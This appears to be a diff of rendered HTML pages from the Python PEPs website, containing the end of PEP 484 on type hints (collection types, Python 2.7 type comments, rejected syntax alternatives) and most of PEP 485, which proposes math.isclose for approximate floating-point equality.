  • Dict, used as Dict[key_type, value_type]
  • +
  • DefaultDict, used as DefaultDict[key_type, value_type], +a generic variant of collections.defaultdict
  • +
  • List, used as List[element_type]
  • +
  • Set, used as Set[element_type]. See remark for AbstractSet +below.
  • +
  • FrozenSet, used as FrozenSet[element_type]
  • +
+

Note: Dict, DefaultDict, List, Set and FrozenSet +are mainly useful for annotating return values. +For arguments, prefer the abstract collection types defined below, +e.g. Mapping, Sequence or AbstractSet.
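
For instance (a brief sketch of this guideline):

from typing import Dict, Sequence

def count_words(words: Sequence[str]) -> Dict[str, int]:
    # Argument: the abstract Sequence accepts lists, tuples, etc.
    # Return value: the concrete Dict tells callers exactly what they get.
    counts = {}  # type: Dict[str, int]
    for word in words:
        counts[word] = counts.get(word, 0) + 1
    return counts

count_words(['a', 'b', 'a'])  # OK
count_words(('a', 'b'))       # OK: a tuple is a Sequence too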

+

Generic variants of container ABCs (and a few non-containers):

+
    +
  • Awaitable
  • +
  • AsyncIterable
  • +
  • AsyncIterator
  • +
  • ByteString
  • +
  • Callable (see above, listed here for completeness)
  • +
  • Collection
  • +
  • Container
  • +
  • ContextManager
  • +
  • Coroutine
  • +
  • Generator, used as Generator[yield_type, send_type, +return_type]. This represents the return value of generator +functions. It is a subtype of Iterable and it has additional +type variables for the type accepted by the send() method (it +is contravariant in this variable – a generator that accepts sending it +Employee instances is valid in a context where a generator is required +that accepts sending it Manager instances) and the return type of the +generator.
  • +
  • Hashable (not generic, but present for completeness)
  • +
  • ItemsView
  • +
  • Iterable
  • +
  • Iterator
  • +
  • KeysView
  • +
  • Mapping
  • +
  • MappingView
  • +
  • MutableMapping
  • +
  • MutableSequence
  • +
  • MutableSet
  • +
  • Sequence
  • +
  • Set, renamed to AbstractSet. This name change was required +because Set in the typing module means set() with +generics.
  • +
  • Sized (not generic, but present for completeness)
  • +
  • ValuesView
  • +
+

A few one-off types are defined that test for single special methods +(similar to Hashable or Sized):

+
    +
  • Reversible, to test for __reversed__
  • +
  • SupportsAbs, to test for __abs__
  • +
  • SupportsComplex, to test for __complex__
  • +
  • SupportsFloat, to test for __float__
  • +
  • SupportsInt, to test for __int__
  • +
  • SupportsRound, to test for __round__
  • +
  • SupportsBytes, to test for __bytes__
  • +
+

Convenience definitions:

+
    +
  • Optional, defined by Optional[t] == Union[t, None]
  • +
  • Text, a simple alias for str in Python 3, for unicode in Python 2
  • +
  • AnyStr, defined as TypeVar('AnyStr', Text, bytes)
  • +
  • NamedTuple, used as +NamedTuple(type_name, [(field_name, field_type), ...]) +and equivalent to +collections.namedtuple(type_name, [field_name, ...]). +This is useful to declare the types of the fields of a named tuple +type. A sketch follows this list.
  • +
  • NewType, used to create unique types with little runtime overhead: +UserId = NewType('UserId', int)
  • +
  • cast(), described earlier
  • +
  • @no_type_check, a decorator to disable type checking per class or +function (see below)
  • +
  • @no_type_check_decorator, a decorator to create your own decorators +with the same meaning as @no_type_check (see below)
  • +
  • @type_check_only, a decorator only available during type checking +for use in stub files (see above); marks a class or function as +unavailable during runtime
  • +
  • @overload, described earlier
  • +
  • get_type_hints(), a utility function to retrieve the type hints from a +function or method. Given a function or method object, it returns +a dict with the same format as __annotations__, but evaluating +forward references (which are given as string literals) as expressions +in the context of the original function or method definition.
  • +
  • TYPE_CHECKING, False at runtime but True to type checkers
  • +
+
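
A minimal sketch of the NamedTuple form listed above:

from typing import NamedTuple

Point = NamedTuple('Point', [('x', float), ('y', float)])

p = Point(1.0, 2.0)
total = p.x + p.y  # fields are typed as float
Point('a', 'b')    # Flagged by a type checker (runtime does not check)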

I/O related types:

+
    +
  • IO (generic over AnyStr)
  • +
  • BinaryIO (a simple subtype of IO[bytes])
  • +
  • TextIO (a simple subtype of IO[str])
  • +
+

Types related to regular expressions and the re module:

+
    +
  • Match and Pattern, types of re.match() and re.compile() +results (generic over AnyStr)
  • +
+
+
+

Suggested syntax for Python 2.7 and straddling code

+

Some tools may want to support type annotations in code that must be +compatible with Python 2.7. For this purpose this PEP has a suggested +(but not mandatory) extension where function annotations are placed in +a # type: comment. Such a comment must be placed immediately +following the function header (before the docstring). An example: the +following Python 3 code:

+
def embezzle(self, account: str, funds: int = 1000000, *fake_receipts: str) -> None:
+    """Embezzle funds from account using fake receipts."""
+    <code goes here>
+
+
+

is equivalent to the following:

+
def embezzle(self, account, funds=1000000, *fake_receipts):
+    # type: (str, int, *str) -> None
+    """Embezzle funds from account using fake receipts."""
+    <code goes here>
+
+
+

Note that for methods, no type is needed for self.

+

For an argument-less method it would look like this:

+
def load_cache(self):
+    # type: () -> bool
+    <code>
+
+
+

Sometimes you want to specify the return type for a function or method +without (yet) specifying the argument types. To support this +explicitly, the argument list may be replaced with an ellipsis. +Example:

+
def send_email(address, sender, cc, bcc, subject, body):
+    # type: (...) -> bool
+    """Send an email message.  Return True if successful."""
+    <code>
+
+
+

Sometimes you have a long list of parameters and specifying their +types in a single # type: comment would be awkward. To this end +you may list the arguments one per line and add a # type: comment +per line after an argument’s associated comma, if any. +To specify the return type use the ellipsis syntax. Specifying the return +type is not mandatory and not every argument needs to be given a type. +A line with a # type: comment should contain exactly one argument. +The type comment for the last argument (if any) should precede the close +parenthesis. Example:

+
def send_email(address,     # type: Union[str, List[str]]
+               sender,      # type: str
+               cc,          # type: Optional[List[str]]
+               bcc,         # type: Optional[List[str]]
+               subject='',
+               body=None    # type: List[str]
+               ):
+    # type: (...) -> bool
+    """Send an email message.  Return True if successful."""
+    <code>
+
+
+

Notes:

+
    +
  • Tools that support this syntax should support it regardless of the +Python version being checked. This is necessary in order to support +code that straddles Python 2 and Python 3.
  • +
  • It is not allowed for an argument or return value to have both +a type annotation and a type comment.
  • +
  • When using the short form (e.g. # type: (str, int) -> None) +every argument must be accounted for, except the first argument of +instance and class methods (those are usually omitted, but it’s +allowed to include them).
  • +
  • The return type is mandatory for the short form. If in Python 3 you +would omit some argument or the return type, the Python 2 notation +should use Any.
  • +
  • When using the short form, for *args and **kwds, put 1 or 2 +stars in front of the corresponding type annotation. (As with +Python 3 annotations, the annotation here denotes the type of the +individual argument values, not of the tuple/dict that you receive +as the special argument value args or kwds.)
  • +
  • Like other type comments, any names used in the annotations must be +imported or defined by the module containing the annotation.
  • +
  • When using the short form, the entire annotation must be one line.
  • +
  • The short form may also occur on the same line as the close +parenthesis, e.g.:
    def add(a, b):  # type: (int, int) -> int
    +    return a + b
    +
    +
    +
  • +
  • Misplaced type comments will be flagged as errors by a type checker. +If necessary, such comments could be commented twice. For example:
    def f():
    +    '''Docstring'''
    +    # type: () -> None  # Error!
    +
    +def g():
    +    '''Docstring'''
    +    # # type: () -> None  # This is OK
    +
    +
    +
  • +
+

When checking Python 2.7 code, type checkers should treat the int and +long types as equivalent. For parameters typed as Text, arguments of +type str as well as unicode should be acceptable.
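
+

As a quick illustration of those Python 2.7 rules, here is a minimal sketch (the function name greet is invented for this example); a checker should accept both str and unicode arguments for name:

+
from typing import Text
+
+def greet(name):
+    # type: (Text) -> Text
+    # Under the Python 2.7 checking rules above, both str and
+    # unicode arguments are acceptable for 'name'.
+    return u'Hello, ' + name
+
+
+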

+
+
+

Rejected Alternatives

+

During discussion of earlier drafts of this PEP, various objections +were raised and alternatives were proposed. We discuss some of these +here and explain why we reject them.

+

Several main objections were raised.

+
+

Which brackets for generic type parameters?

+

Most people are familiar with the use of angular brackets +(e.g. List<int>) in languages like C++, Java, C# and Swift to +express the parameterization of generic types. The problem with these +is that they are really hard to parse, especially for a simple-minded +parser like Python. In most languages the ambiguities are usually +dealt with by only allowing angular brackets in specific syntactic +positions, where general expressions aren’t allowed. (And also by +using very powerful parsing techniques that can backtrack over an +arbitrary section of code.)

+

But in Python, we’d like type expressions to be (syntactically) the +same as other expressions, so that we can use e.g. variable assignment +to create type aliases. Consider this simple type expression:

+
List<int>
+
+
+

From the Python parser’s perspective, the expression begins with the +same four tokens (NAME, LESS, NAME, GREATER) as a chained comparison:

+
a < b > c  # I.e., (a < b) and (b > c)
+
+
+

We can even make up an example that could be parsed both ways:

+
a < b > [ c ]
+
+
+

Assuming we had angular brackets in the language, this could be +interpreted as either of the following two:

+
(a<b>)[c]      # I.e., (a<b>).__getitem__(c)
+a < b > ([c])  # I.e., (a < b) and (b > [c])
+
+
+

It would surely be possible to come up with a rule to disambiguate +such cases, but to most users the rules would feel arbitrary and +complex. It would also require us to dramatically change the CPython +parser (and every other parser for Python). It should be noted that +Python’s current parser is intentionally “dumb” – a simple grammar is +easier for users to reason about.

+

For all these reasons, square brackets (e.g. List[int]) are (and +have long been) the preferred syntax for generic type parameters. +They can be implemented by defining the __getitem__() method on +the metaclass, and no new syntax is required at all. This option +works in all recent versions of Python (starting with Python 2.2). +Python is not alone in this syntactic choice – generic classes in +Scala also use square brackets.
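
+

As a minimal sketch of that mechanism (illustrative only, using Python 3 syntax; this is not the actual typing implementation), indexing a class simply invokes __getitem__ on its metaclass:

+
class GenericMeta(type):
+    # Indexing a class (e.g. List[int]) invokes __getitem__ on its
+    # metaclass, so no parser changes are needed.
+    def __getitem__(cls, params):
+        print('parameterized with', params)
+        return cls
+
+class List(metaclass=GenericMeta):
+    pass
+
+List[int]       # prints: parameterized with <class 'int'>
+List[int, str]  # prints: parameterized with (<class 'int'>, <class 'str'>)
+
+
+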

+
+
+

What about existing uses of annotations?

+

One line of argument points out that PEP 3107 explicitly supports +the use of arbitrary expressions in function annotations. The new +proposal is then considered incompatible with the specification of PEP +3107.

+

Our response to this is that, first of all, the current proposal does +not introduce any direct incompatibilities, so programs using +annotations in Python 3.4 will still work correctly and without +prejudice in Python 3.5.

+

We do hope that type hints will eventually become the sole use for +annotations, but this will require additional discussion and a +deprecation period after the initial roll-out of the typing module +with Python 3.5. The current PEP will have provisional status (see +PEP 411) until Python 3.6 is released. The fastest conceivable scheme +would introduce silent deprecation of non-type-hint annotations in +3.6, full deprecation in 3.7, and declare type hints as the only +allowed use of annotations in Python 3.8. This should give authors of +packages that use annotations plenty of time to devise another +approach, even if type hints become an overnight success.

+

(UPDATE: As of fall 2017, the timeline for the end of provisional +status for this PEP and for the typing.py module has changed, and +so has the deprecation schedule for other uses of annotations. For +the updated schedule see PEP 563.)

+

Another possible outcome would be that type hints will eventually +become the default meaning for annotations, but that there will always +remain an option to disable them. For this purpose the current +proposal defines a decorator @no_type_check which disables the +default interpretation of annotations as type hints in a given class +or function. It also defines a meta-decorator +@no_type_check_decorator which can be used to decorate a decorator +(!), causing annotations in any function or class decorated with the +latter to be ignored by the type checker.
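
+

For example, a sketch of opting a single function out (the function and its annotations are invented for this example):

+
from typing import no_type_check
+
+@no_type_check
+def transmogrify(spell: 'not a type', target: 'also not a type'):
+    # With @no_type_check applied, a checker ignores these
+    # annotations instead of interpreting them as type hints.
+    return (spell, target)
+
+
+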

+

There are also # type: ignore comments, and static checkers should +support configuration options to disable type checking in selected +packages.

+

Despite all these options, proposals have been circulated to allow +type hints and other forms of annotations to coexist for individual +arguments. One proposal suggests that if an annotation for a given +argument is a dictionary literal, each key represents a different form +of annotation, and the key 'type' would be used for type hints. +The problem with this idea and its variants is that the notation +becomes very “noisy” and hard to read. Also, in most cases where +existing libraries use annotations, there would be little need to +combine them with type hints. So the simpler approach of selectively +disabling type hints appears sufficient.

+
+
+

The problem of forward declarations

+

The current proposal is admittedly sub-optimal when type hints must +contain forward references. Python requires all names to be defined +by the time they are used. Apart from circular imports this is rarely +a problem: “use” here means “look up at runtime”, and with most +“forward” references there is no problem in ensuring that a name is +defined before the function using it is called.

+

The problem with type hints is that annotations (per PEP 3107, and +similar to default values) are evaluated at the time a function is +defined, and thus any names used in an annotation must already be +defined when the function is being defined. A common scenario is a +class definition whose methods need to reference the class itself in +their annotations. (More generally, it can also occur with mutually +recursive classes.) This is natural for container types, for +example:

+
class Node:
+    """Binary tree node."""
+
+    def __init__(self, left: Node, right: Node):
+        self.left = left
+        self.right = right
+
+
+

As written this will not work, because of the peculiarity in Python +that class names become defined once the entire body of the class has +been executed. Our solution, which isn’t particularly elegant, but +gets the job done, is to allow using string literals in annotations. +Most of the time you won’t have to use this though – most uses of +type hints are expected to reference builtin types or types defined in +other modules.
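
+

With string literals, the example above becomes:

+
class Node:
+    """Binary tree node."""
+
+    def __init__(self, left: 'Node', right: 'Node'):
+        # The quoted annotations are resolved later, e.g. by
+        # typing.get_type_hints(), once Node actually exists.
+        self.left = left
+        self.right = right
+
+
+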

+

A counterproposal would change the semantics of type hints so they +aren’t evaluated at runtime at all (after all, type checking happens +off-line, so why would type hints need to be evaluated at runtime?). +This of course would run afoul of backwards compatibility, +since the Python interpreter doesn’t actually know whether a +particular annotation is meant to be a type hint or something else.

+

A compromise is possible where a __future__ import could enable +turning all annotations in a given module into string literals, as +follows:

+
from __future__ import annotations
+
+class ImSet:
+    def add(self, a: ImSet) -> List[ImSet]: ...
+
+assert ImSet.add.__annotations__ == {'a': 'ImSet', 'return': 'List[ImSet]'}
+
+
+

Such a __future__ import statement may be proposed in a separate +PEP.

+

(UPDATE: That __future__ import statement and its consequences +are discussed in PEP 563.)

+
+
+

The double colon

+

A few creative souls have tried to invent solutions for this problem. +For example, it was proposed to use a double colon (::) for type +hints, solving two problems at once: disambiguating between type hints +and other annotations, and changing the semantics to preclude runtime +evaluation. There are several things wrong with this idea, however.

+
    +
  • It’s ugly. The single colon in Python has many uses, and all of +them look familiar because they resemble the use of the colon in +English text. This is a general rule of thumb by which Python +abides for most forms of punctuation; the exceptions are typically +well known from other programming languages. But this use of :: +is unheard of in English, and in other languages (e.g. C++) it is +used as a scoping operator, which is a very different beast. In +contrast, the single colon for type hints reads naturally – and no +wonder, since it was carefully designed for this purpose +(the idea +long predates PEP 3107). It is also used in the same +fashion in other languages from Pascal to Swift.
  • +
  • What would you do for return type annotations?
  • +
  • It’s actually a feature that type hints are evaluated at runtime.
      +
    • Making type hints available at runtime allows runtime type +checkers to be built on top of type hints.
    • +
    • It catches mistakes even when the type checker is not run. Since +it is a separate program, users may choose not to run it (or even +install it), but might still want to use type hints as a concise +form of documentation. Broken type hints are no use even for +documentation.
    • +
    +
  • +
  • Because it’s new syntax, using the double colon for type hints would +limit them to code that works with Python 3.5 only. By using +existing syntax, the current proposal can easily work for older +versions of Python 3. (And in fact mypy supports Python 3.2 and +newer.)
  • +
  • If type hints become successful we may well decide to add new syntax +in the future to declare the type for variables, for example +var age: int = 42. If we were to use a double colon for +argument type hints, for consistency we’d have to use the same +convention for future syntax, perpetuating the ugliness.
  • +
+
+
+

Other forms of new syntax

+

A few other forms of alternative syntax have been proposed, e.g. the +introduction of a where keyword, and Cobra-inspired +requires clauses. But these all share a problem with the double +colon: they won’t work for earlier versions of Python 3. The same +would apply to a new __future__ import.

+
+
+

Other backwards compatible conventions

+

The ideas put forward include:

+
    +
  • A decorator, e.g. @typehints(name=str, returns=str). This could +work, but it’s pretty verbose (an extra line, and the argument names +must be repeated), and a far cry in elegance from the PEP 3107 +notation.
  • +
  • Stub files. We do want stub files, but they are primarily useful +for adding type hints to existing code that doesn’t lend itself to +adding type hints, e.g. 3rd party packages, code that needs to +support both Python 2 and Python 3, and especially extension +modules. For most situations, having the annotations in line with +the function definitions makes them much more useful.
  • +
  • Docstrings. There is an existing convention for docstrings, based +on the Sphinx notation (:type arg1: description). This is +pretty verbose (an extra line per parameter), and not very elegant. +We could also make up something new, but the annotation syntax is +hard to beat (because it was designed for this very purpose).
  • +
+

It’s also been proposed to simply wait another release. But what +problem would that solve? It would just be procrastination.

+
+
+
+

PEP Development Process

+

A live draft for this PEP lives on GitHub. There is also an +issue tracker, where much of the technical discussion takes +place.

+

The draft on GitHub is updated regularly in small increments. The +official PEPS repo is (usually) only updated when a new draft +is posted to python-dev.

+
+
+

Acknowledgements

+

This document could not be completed without valuable input, +encouragement and advice from Jim Baker, Jeremy Siek, Michael Matson +Vitousek, Andrey Vlasovskikh, Radomir Dopieralski, Peter Ludemann, +and the BDFL-Delegate, Mark Shannon.

+

Influences include existing languages, libraries and frameworks +mentioned in PEP 482. Many thanks to their creators, in alphabetical +order: Stefan Behnel, William Edwards, Greg Ewing, Larry Hastings, +Anders Hejlsberg, Alok Menghrajani, Travis E. Oliphant, Joe Pamer, +Raoul-Gabriel Urma, and Julien Verlaguet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0484.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0485/index.html b/pep-0485/index.html new file mode 100644 index 00000000000..fc9a06571e4 --- /dev/null +++ b/pep-0485/index.html @@ -0,0 +1,717 @@ + + + + + + + + PEP 485 – A Function for testing approximate equality | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 485 – A Function for testing approximate equality

+
+
Author:
+
Christopher Barker <PythonCHB at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jan-2015
+
Python-Version:
+
3.5
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of an isclose() function to the standard +library math module that determines whether one value is approximately equal +or “close” to another value.

+
+
+

Rationale

+

Floating point values have limited precision, which makes them unable +to exactly represent some values and causes errors to accumulate with +repeated computation. As a result, it is common advice to only use an +equality comparison in very specific situations. Often an inequality +comparison fits the bill, but there are times (often in testing) where +the programmer wants to determine whether a computed value is “close” +to an expected value, without requiring them to be exactly equal. This +need is common enough, particularly in testing, and not always obvious +to satisfy, that it would be a useful addition to the standard library.

+
+

Existing Implementations

+

The standard library includes the unittest.TestCase.assertAlmostEqual +method, but it:

+
    +
  • Is buried in the unittest.TestCase class
  • +
  • Is an assertion, so you can’t use it as a general test at the command +line, etc. (easily)
  • +
  • Is an absolute difference test. Often the measure of difference +required, particularly for floating point numbers, is a relative error, +i.e. “Are these two values within x% of each other?”, rather than an +absolute error, particularly when the magnitude of the values is +unknown a priori.
  • +
+

The numpy package has the allclose() and isclose() functions, +but they are only available with numpy.

+

The statistics package tests include an implementation, used for its +unit tests.

+

One can also find discussion and sample implementations on Stack +Overflow and other help sites.

+

Many other non-python systems provide such a test, including the Boost C++ +library and the APL language [4].

+

These existing implementations indicate that this is a common need and +not trivial to write oneself, making it a candidate for the standard +library.

+
+
+
+

Proposed Implementation

+

NOTE: this PEP is the result of extended discussions on the +python-ideas list [1].

+

The new function will go into the math module, and have the following +signature:

+
isclose(a, b, rel_tol=1e-9, abs_tol=0.0)
+
+
+

a and b: are the two values to be tested for relative closeness

+

rel_tol: is the relative tolerance – it is the amount of error +allowed, relative to the larger absolute value of a or b. For example, +to set a tolerance of 5%, pass rel_tol=0.05. The default tolerance is 1e-9, +which assures that the two values are the same within about 9 decimal +digits. rel_tol must be greater than 0.0.

+

abs_tol: is a minimum absolute tolerance level – useful for +comparisons near zero.

+

Modulo error checking, etc, the function will return the result of:

+
abs(a-b) <= max( rel_tol * max(abs(a), abs(b)), abs_tol )
+
+
+

The name, isclose, is selected for consistency with the existing +isnan and isinf.

+
+

Handling of non-finite numbers

+

The IEEE 754 special values of NaN, inf, and -inf will be handled +according to IEEE rules. Specifically, NaN is not considered close to +any other value, including NaN. inf and -inf are only considered close +to themselves.
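
+

A minimal pure-Python sketch of these rules (the name isclose_sketch is ours; the real math module implementation is in C and performs more thorough error checking):

+
from math import isinf
+
+def isclose_sketch(a, b, rel_tol=1e-9, abs_tol=0.0):
+    if a == b:
+        # Covers exact equality, including inf compared to inf.
+        return True
+    if isinf(a) or isinf(b):
+        # Differing infinities are never close, and inf - inf is nan.
+        return False
+    # Any comparison involving NaN is False, so NaN is close to nothing.
+    return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
+
+
+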

+
+
+

Non-float types

+

The primary use-case is expected to be floating point numbers. +However, users may want to compare other numeric types similarly. In +theory, it should work for any type that supports abs(), +multiplication, comparisons, and subtraction. However, the implementation +in the math module is written in C, and thus cannot (easily) use Python’s +duck typing. Rather, the values passed into the function will be converted +to the float type before the calculation is performed. Passing in types +(or values) that cannot be converted to floats will raise an appropriate +Exception (TypeError, ValueError, or OverflowError).

+

The code will be tested to accommodate at least some values of these types:

+
    +
  • Decimal
  • +
  • int
  • +
  • Fraction
  • +
  • complex: For complex, a companion function will be added to the +cmath module. In cmath.isclose(), the tolerances are specified +as floats, and the absolute value of the complex values +will be used for scaling and comparison. If a complex tolerance is +passed in, the absolute value will be used as the tolerance.
  • +
+

NOTE: it may make sense to add a Decimal.isclose() that works properly and +completely with the decimal type, but that is not included as part of this PEP.
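
+

For example, with the proposed companion function, closeness of complex values is scaled by their magnitudes:

+
import cmath
+
+# |a - b| is 1e-9; the larger magnitude is about 1.414, so the
+# allowed difference at rel_tol=1e-9 is about 1.414e-9.
+print(cmath.isclose(1 + 1j, (1 + 1e-9) + 1j))  # True
+
+
+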

+
+
+

Behavior near zero

+

Relative comparison is problematic if either value is zero. By +definition, no value is small relative to zero. And computationally, +if either value is zero, the difference is the absolute value of the +other value, and the computed absolute tolerance will be rel_tol +times that value. When rel_tol is less than one, the difference will +never be less than the tolerance.

+

However, while mathematically correct, there are many use cases where +a user will need to know if a computed value is “close” to zero. This +calls for an absolute tolerance test. If the user needs to call this +function inside a loop or comprehension, where some, but not all, of +the expected values may be zero, it is important that both a relative +tolerance and absolute tolerance can be tested for with a single +function with a single set of parameters.

+

There is a similar issue if the two values to be compared straddle zero: +if a is approximately equal to -b, then a and b will never be computed +as “close”.

+

To handle this case, an optional parameter, abs_tol, can be +used to set a minimum tolerance used in the case of very small or zero +computed relative tolerance. That is, the values will always be +considered close if the difference between them is less than +abs_tol.

+

The default absolute tolerance value is set to zero because there is +no value that is appropriate for the general case. It is impossible to +know an appropriate value without knowing the likely values expected +for a given use case. If all the values tested are on the order of one, +then a value of about 1e-9 might be appropriate, but that would be far +too large if expected values are on the order of 1e-9 or smaller.

+

Any non-zero default might result in users’ tests passing totally +inappropriately. If, on the other hand, a test against zero fails the +first time with defaults, a user will be prompted to select an +appropriate value for the problem at hand in order to get the test to +pass.

+

NOTE: the author of this PEP has resolved to go back over many of +his tests that use the numpy allclose() function, which provides +a default absolute tolerance, and make sure that the default value is +appropriate.

+

If the user sets the rel_tol parameter to 0.0, then only the +absolute tolerance will affect the result. While not the goal of the +function, it does allow it to be used as a purely absolute tolerance +check as well.
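
+

A few illustrative cases, using the proposed defaults except where overridden:

+
from math import isclose
+
+assert isclose(1.0 + 1e-10, 1.0)                    # well within rel_tol=1e-9
+assert not isclose(1e-10, 0.0)                      # comparison to zero needs abs_tol
+assert isclose(1e-10, 0.0, abs_tol=1e-9)            # absolute tolerance applies
+assert isclose(2.0, 1.0, rel_tol=0.0, abs_tol=1.5)  # purely absolute check
+
+
+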

+
+
+

Implementation

+

A sample implementation in Python is available (as of Jan 22, 2015) on +GitHub:

+

https://github.com/PythonCHB/close_pep/blob/master/is_close.py

+

This implementation has a flag that lets the user select which +relative tolerance test to apply – this PEP does not suggest that +that be retained, but rather that the weak test be selected.

+

There are also drafts of this PEP and test code, etc. there:

+

https://github.com/PythonCHB/close_pep

+
+
+
+

Relative Difference

+

There are essentially two ways to think about how close two numbers +are to each other:

+

Absolute difference: simply abs(a-b)

+

Relative difference: abs(a-b)/scale_factor [2].

+

The absolute difference is trivial enough that this proposal focuses +on the relative difference.

+

Usually, the scale factor is some function of the values under +consideration, for instance:

+
    +
  1. The absolute value of one of the input values
  +
  2. The maximum absolute value of the two
  +
  3. The minimum absolute value of the two
  +
  4. The absolute value of the arithmetic mean of the two
  +
+

These lead to the following possibilities for determining if two +values, a and b, are close to each other.

+
    +
  1. abs(a-b) <= tol*abs(a)
  +
  2. abs(a-b) <= tol * max( abs(a), abs(b) )
  +
  3. abs(a-b) <= tol * min( abs(a), abs(b) )
  +
  4. abs(a-b) <= tol * abs(a + b)/2
  +
+

NOTE: (2) and (3) can also be written as:

+
    +
  2. (abs(a-b) <= abs(tol*a)) or (abs(a-b) <= abs(tol*b))
  +
  3. (abs(a-b) <= abs(tol*a)) and (abs(a-b) <= abs(tol*b))
  +
+

(Boost refers to these as the “weak” and “strong” formulations [3].) +These can be a tiny bit more computationally efficient, and thus are +used in the example code.

+

Each of these formulations can lead to slightly different results. +However, if the tolerance value is small, the differences are quite +small; in fact, often less than the available floating point precision.

+
+

How much difference does it make?

+

When selecting a method to determine closeness, one might want to know +how much of a difference it could make to use one test or the other +– i.e. how many values are there (or what range of values) that will +pass one test, but not the other.

+

The largest difference is between options (2) and (3) where the +allowable absolute difference is scaled by either the larger or +smaller of the values.

+

Define delta to be the difference between the allowable absolute +tolerance defined by the larger value and that defined by the smaller +value. That is, the amount that the two input values need to be +different in order to get a different result from the two tests. +tol is the relative tolerance value.

+

Assume that a is the larger value and that both a and b +are positive, to make the analysis a bit easier. delta is +therefore:

+
delta = tol * (a-b)
+
+
+

or:

+
delta / tol = (a-b)
+
+
+

The largest absolute difference that would pass the test: (a-b), +equals the tolerance times the larger value:

+
(a-b) = tol * a
+
+
+

Substituting into the expression for delta:

+
delta / tol = tol * a
+
+
+

so:

+
delta = tol**2 * a
+
+
+

For example, for a = 10, b = 9, tol = 0.1 (10%):

+

maximum tolerance tol * a == 0.1 * 10 == 1.0

+

minimum tolerance tol * b == 0.1 * 9.0 == 0.9

+

delta = (1.0 - 0.9) = 0.1, or tol**2 * a = 0.1**2 * 10 = 0.1

+

The absolute difference between the maximum and minimum tolerance +tests in this case could be substantial. However, the primary use +case for the proposed function is testing the results of computations. +In that case a relative tolerance is likely to be selected of much +smaller magnitude.

+

For example, a relative tolerance of 1e-8 is about half the +precision available in a python float. In that case, the difference +between the two tests is 1e-8**2 * a or 1e-16 * a, which is +close to the limit of precision of a python float. If the relative +tolerance is set to the proposed default of 1e-9 (or smaller), the +difference between the two tests will be lost to the limits of +precision of floating point. That is, each of the four methods will +yield exactly the same results for all values of a and b.

+

In addition, in common use, tolerances are defined to 1 significant +figure – that is, 1e-9 is specifying about 9 decimal digits of +accuracy. So the difference between the various possible tests is well +below the precision to which the tolerance is specified.

+
+
+

Symmetry

+

A relative comparison can be either symmetric or non-symmetric. For a +symmetric algorithm:

+

isclose(a,b) is always the same as isclose(b,a)

+

If a relative closeness test uses only one of the values (such as (1) +above), then the result is asymmetric, i.e. isclose(a,b) is not +necessarily the same as isclose(b,a).

+

Which approach is most appropriate depends on what question is being +asked. If the question is: “are these two numbers close to each +other?”, there is no obvious ordering, and a symmetric test is most +appropriate.

+

However, if the question is: “Is the computed value within x% of this +known value?”, then it is appropriate to scale the tolerance to the +known value, and an asymmetric test is most appropriate.

+

From the previous section, it is clear that either approach would +yield the same or similar results in the common use cases. In that +case, the goal of this proposal is to provide a function that is least +likely to produce surprising results.

+

The symmetric approach provides an appealing consistency – it +mirrors the symmetry of equality, and is less likely to confuse +people. A symmetric test also relieves the user of the need to think +about the order in which to set the arguments. It was also pointed +out that there may be some cases where the order of evaluation may not +be well defined, for instance in the case of comparing a set of values +all against each other.

+

There may be cases when a user does need to know that a value is +within a particular range of a known value. In that case, it is easy +enough to simply write the test directly:

+
if a-b <= tol*a:
+
+
+

(assuming a > b in this case). There is little need to provide a +function for this particular case.

+

This proposal uses a symmetric test.

+
+
+

Which symmetric test?

+

There are three symmetric tests considered:

+

The case that uses the arithmetic mean of the two values requires that +the values either be added together before dividing by 2, which could +result in overflow to inf for very large numbers, or that each value be +divided by two before being added together, which could result in +underflow to zero for very small numbers. This effect would only occur +at the very limit of float values, but it was decided there was no +benefit to the method worth reducing the range of functionality or +adding the complexity of checking values to determine the order of +computation.

+

This leaves the Boost “weak” test (2), which uses the larger of the +values to scale the tolerance, and the Boost “strong” test (3), which +uses the smaller. For small tolerances they yield the same result, but +this proposal uses the Boost “weak” test, as it is symmetric and +provides a more useful result for very large tolerances.

+
+
+

Large Tolerances

+

The most common use case is expected to be small tolerances – on the order of +the default 1e-9. However, there may be use cases where a user wants to know if +two fairly disparate values are within a particular range of each other: “is a +within 200% (rel_tol = 2.0) of b?” In this case, the strong test would never +indicate that two values are within that range of each other if one of them is +zero. The weak test, however, would use the larger (non-zero) value for the +test, and thus return True if one value is zero. For example: is 0 within 200% +of 10? 200% of ten is 20, so the range within 200% of ten is -10 to +30. Zero +falls within that range, so it will return True.
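
+

Working that example through both formulations:

+
a, b, rel_tol = 0.0, 10.0, 2.0
+
+print(abs(a - b) <= rel_tol * max(abs(a), abs(b)))  # weak test:   10 <= 20 -> True
+print(abs(a - b) <= rel_tol * min(abs(a), abs(b)))  # strong test: 10 <= 0  -> False
+
+
+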

+
+
+
+

Defaults

+

Default values are required for the relative and absolute tolerance.

+
+

Relative Tolerance Default

+

The relative tolerance required for two values to be considered +“close” is entirely use-case dependent. Nevertheless, the relative +tolerance needs to be greater than 1e-16 (approximate precision of a +python float). The value of 1e-9 was selected because it is the +largest relative tolerance for which the various possible methods will +yield the same result, and it is also about half of the precision +available to a python float. In the general case, a good numerical +algorithm is not expected to lose more than about half of available +digits of accuracy, and if a much larger tolerance is acceptable, the +user should be considering the proper value in that case. Thus 1e-9 is +expected to “just work” for many cases.

+
+
+

Absolute tolerance default

+

The absolute tolerance value will be used primarily for comparing to +zero. The absolute tolerance required to determine if a value is +“close” to zero is entirely use-case dependent. There are also +essentially no bounds to the useful range – expected values would +conceivably be anywhere within the limits of a python float. Thus a +default of 0.0 is selected.

+

If, for a given use case, a user needs to compare to zero, the test +will be guaranteed to fail the first time, and the user can select an +appropriate value.

+

